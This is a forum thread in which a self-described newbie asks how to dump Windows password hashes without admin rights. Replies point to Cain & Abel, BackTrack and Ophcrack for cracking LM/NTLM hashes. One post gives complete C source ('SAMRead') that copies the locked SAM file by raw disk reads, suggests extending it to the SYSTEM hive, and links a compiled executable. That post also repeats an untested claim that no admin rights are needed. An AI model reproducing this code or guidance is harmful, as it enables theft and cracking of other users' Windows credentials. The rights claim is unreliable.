Newbie Question about PWDump

[tempnode]

Is there any form of PWDump that does NOT require admin access to successfully run?

I'm not very familiar with the hacking tools... but I'm trying to learn.

Thanks!

[mubix]

Is there any form of PWDump that does NOT require admin access to successfully run?

I'm not very familiar with the hacking tools... but I'm trying to learn.

Thanks!

Not really. This is due to the file it accesses, the SAM file, which is guarded by permissions that only allow administrative access. I welcome you to try out a program called Cain & Able and see what you can find.

[Esqulax]

You can boot backtrack and run a command to save the password hash

[digip]

Easiest tool for cracking them is http://ophcrack.sourceforge.net/ since it does it automatically on boot. You can also CLI copy it to a USB key for cracking later agains't rainbow tables if the cd can't crack it for you, given a stronger, longer than 14 character NTLM hashed passwords, plus it will now do Vista passwords as well.

Features:

» Runs on Windows, Linux/Unix, Mac OS X, ...

» Cracks LM and NTLM hashes.

» Free tables available for Windows XP and Vista.

» Brute-force module for simple passwords.

» LiveCD available to simplify the cracking.

» Loads hashes from encrypted SAM recovered from a Windows partition, Vista included.

» Free and open source software (GPL).

[Iain]

Not really. This is due to the file it accesses, the SAM file, which is guarded by permissions that only allow administrative access. I welcome you to try out a program called Cain & Able and see what you can find.

I'm fairly sure that the SAM file can be obtained without admin access. I'm not entirely familiar with the programming, but the file is obtained by accessing the drive directly rather than via the File Table. The location of the file is obtained and the drive accessed directly. I'll see if I can find the details if anyone's interested.

[VaKo]

That does sound fun actually, post some details.

[Iain]

Here's the code:

/*
SAMRead - by Napalm @ NetCore2K
-------------------------------
Please try and read and understand this source code. You will learn somthing.

Sector  = 512 Bytes of disk space
Cluster = A Group of Sectors. This is different depending on your file
      system. But normally its 4Kb so thats 8 sectors.
VCN    = Virtual Cluster Number. Simply the index of the cluster within its context.
LCN    = Logical Cluster Number. The physical cluster index on containing media.
Extent    = The extent of a Cluster index.

The DirectCopy function invokes a Device Control Code to get the cluster information about a file.
We then loop though each resulting extent and copy each cluster to a new file.
*/

#define _WIN32_WINNT 0x0500
#include <windows.h>
#include <winioctl.h>

BOOL DirectCopy(LPSTR lpszSrc, LPSTR lpszDest)
{
    BOOL bResult = FALSE;
    HANDLE hSrc = CreateFile(lpszSrc, FILE_READ_ATTRIBUTES, (FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE), NULL, OPEN_EXISTING, 0, 0);
    if(hSrc != INVALID_HANDLE_VALUE){
        CHAR szDrive[7]; wsprintf(szDrive, "%c:", *lpszSrc);
        DWORD dwSectorPerCluster, dwBytesPerSector;
        GetDiskFreeSpace(szDrive, &dwSectorPerCluster, &dwBytesPerSector, NULL, NULL);
        DWORD dwClusterSize = (dwBytesPerSector * dwSectorPerCluster);
        LARGE_INTEGER liFileSize; liFileSize.LowPart = GetFileSize(hSrc, (LPDWORD)&liFileSize.HighPart);
        DWORD dwClusters = (liFileSize.QuadPart / dwClusterSize);
        DWORD dwRead, dwWritten, dwPointsSize = sizeof(RETRIEVAL_POINTERS_BUFFER) + (dwClusters * (sizeof(LARGE_INTEGER) * 2));
        PRETRIEVAL_POINTERS_BUFFER pPoints = (PRETRIEVAL_POINTERS_BUFFER) new BYTE[dwPointsSize];
        STARTING_VCN_INPUT_BUFFER vcnStart = { 0 };
        if(DeviceIoControl(hSrc, FSCTL_GET_RETRIEVAL_POINTERS, &vcnStart, sizeof(vcnStart), pPoints, dwPointsSize, &dwWritten, NULL)){
            wsprintf(szDrive, "\\\\.\\%c:", *lpszSrc);
            HANDLE hDrive = CreateFile(szDrive, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, 0);
            if(hDrive != INVALID_HANDLE_VALUE){
                HANDLE hDest = CreateFile(lpszDest, GENERIC_WRITE, 0, NULL, CREATE_NEW, 0, 0);
                if(hDest != INVALID_HANDLE_VALUE){
                    SetFilePointer(hDest, liFileSize.LowPart, &liFileSize.HighPart, FILE_BEGIN);
                    SetEndOfFile(hDest);
                    LPBYTE lpCluster = new BYTE[dwClusterSize];
                    LARGE_INTEGER vcnPrev = pPoints->StartingVcn;
                    for(DWORD dwExtent = 0; dwExtent < pPoints->ExtentCount; dwExtent++){
                        DWORD dwLength = (DWORD)(pPoints->Extents[dwExtent].NextVcn.QuadPart - vcnPrev.QuadPart);
                        LARGE_INTEGER liSrcPos = { (pPoints->Extents[dwExtent].Lcn.QuadPart * dwClusterSize) };
                        LARGE_INTEGER liDstPos = { (vcnPrev.QuadPart * dwClusterSize) };
                        for(DWORD dwCluster = 0; dwCluster < dwLength; dwCluster++){
                            SetFilePointer(hDrive, liSrcPos.LowPart, &liSrcPos.HighPart, FILE_BEGIN);
                            ReadFile(hDrive, lpCluster, dwClusterSize, &dwRead, NULL);
                            SetFilePointer(hDest, liDstPos.LowPart, &liDstPos.HighPart, FILE_BEGIN);
                            WriteFile(hDest, lpCluster, dwRead, &dwWritten, NULL);
                            liSrcPos.QuadPart += dwClusterSize; liDstPos.QuadPart += dwClusterSize;
                        }
                        vcnPrev = pPoints->Extents[dwExtent].NextVcn;
                    }
                    delete lpCluster;
                    CloseHandle(hDest);
                    bResult = TRUE;
                }
                CloseHandle(hDrive);
            }
        }
        delete pPoints;
        CloseHandle(hSrc);
    }
    return bResult;
}

int main(int argc, char *argv[])
{
    CHAR szSAMFile[MAX_PATH + 12];
    GetSystemDirectory(szSAMFile, MAX_PATH);
    lstrcat(szSAMFile, "\\config\\SAM");
    return DirectCopy(szSAMFile, ".\\SAM.dat");
}

from http://www.rohitab.com/discuss/index.php?s...&hl=samread There's a compiled executable there too. The code can be changed to grab the system file too. I read a couple of comments on the same group that the SAM and system files can be retrieved whether logged in with admin rights or not. I've not tried it though.

[digip]

Wow. If this works like you said, then any user can copy ANY file on disk from any other account. Have you tried it? Any proof it still works? The post is kinda old, and I imagine it could be patched against or monitored at the kerenel level.

Cain and pwDump will crash lsass and cause a system to reboot, so at some point windows patched against them. I imagine they could be doing same thing, but I don't know there process of reading the sam file.

[Iain]

I guess if someone has an XP SP3 fully patched PC, they could try it. The last time that I played around was well before SP3. Now, if it could be changed to WRITE directly to anywhere on the disc, that could be very dangerous ... (yes, I suppose that writing to the disc isn't all that hard, but what about the File Table entry and setting the file permissions etc.?).

Edit: as a matter of interest, I'm fairly sure that the same poster on Rohitab produced code to copy any file using the same technique. I recall that user interaction was as the executable was run, rather than having to modify the code then recompile it. That made it much more user friendly. I don't know if it's been tried on Vista.